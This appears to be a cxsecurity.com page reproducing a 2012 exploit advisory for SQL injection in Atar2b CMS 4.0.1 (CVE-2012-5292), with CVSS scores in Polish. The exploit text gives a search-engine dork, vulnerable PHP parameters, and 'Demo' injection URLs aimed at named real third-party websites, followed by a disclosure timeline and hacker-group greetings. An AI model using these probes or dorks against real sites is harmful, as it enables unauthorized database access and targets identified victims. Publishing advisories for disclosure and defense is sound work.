Atar2b CMS 4.0.1 SQL Injection

2012-01-07 / 2012-10-05
Credit: BHG Security Center
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2012-5292
CWE: CWE-89
Dork: intext:\"Atar2b\"


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: Atar2b Cms SQL Injection Vulnerability # Date: 2012-01-06 [GMT +7] # Author: BHG Security Center # Software Link: http://www.atar2b.co.il/ # Vendor Response(s): They didn't respond to the emails. # Dork: intext:"Atar2b ????? ?????? ?????" # Version : [4.0.1] # Tested on: ubuntu 11.04 # CVE : - # Finder(s): - Net.Edit0r (Net.edit0r [at] att [dot] net) - G3n3Rall (Ant1_s3cur1ty [at] yahoo [dot] com) ----------------------------------------------------------------------------------------- Atar2b Israel Cms SQL Injection Vulnerability ----------------------------------------------------------------------------------------- Author : BHG Security Center Date : 2012-01-06 Location : Iran Web : http://Black-Hg.Org Critical Lvl : Medium Where : From Remote My Group : Black Hat Group #BHG --------------------------------------------------------------------------- PoC/Exploit: ~~~~~~~~~~ ~ [PoC] ~: /website_path/pageE.php?id=[SQLi] ~ [PoC] ~: /website_path/gallery_e.php?id=[SQLi] ~ [PoC] ~: /website_path/pageH.php?id=[SQLi] ~~~~~~~~ Exploit ~ [PoC] ~: Http://[victim]/path/pageE.php?id=[SQLi] ~ [PoC] ~: Http://[victim]/path/gallery_e.php?id=[SQLi] Demo: ~~~~~~~~~ http://www.vertexhome.co.il/gallery_e.php?id=118+order+by+10-- http://www.vertexhome.co.il/pageE.php?id=118+order+by+10-- http://www.clil.co.il/pageH.php?id=104' Timeline: ~~~~~~~~~ - 02 - 01 - 2012 bug found. - 03 - 01 - 2012 vendor contacted, but no response. - 06 - 01 - 2012 Advisories release. Important Notes: ~~~~~~~~~ - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in - the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. --------------------------------------------------------------------------- Greetz To:A.Cr0x | 3H34N | tHe.k!ll3r | Mr.XHat |NoL1m1t |Bl4ck.Viper Spical Th4nks: B3hz4d | ArYaIeIrAN| _SENATOR_ |Cyber C0der And All My Friendz [!] Persian Gulf 4 Ever [!] I Love Iran And All Iranian People Greetz To : 1337day.com ~ exploit-db.com [h4ckcity tM] And All Iranian HackerZ -------------------------------- [ EOF ] ----------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top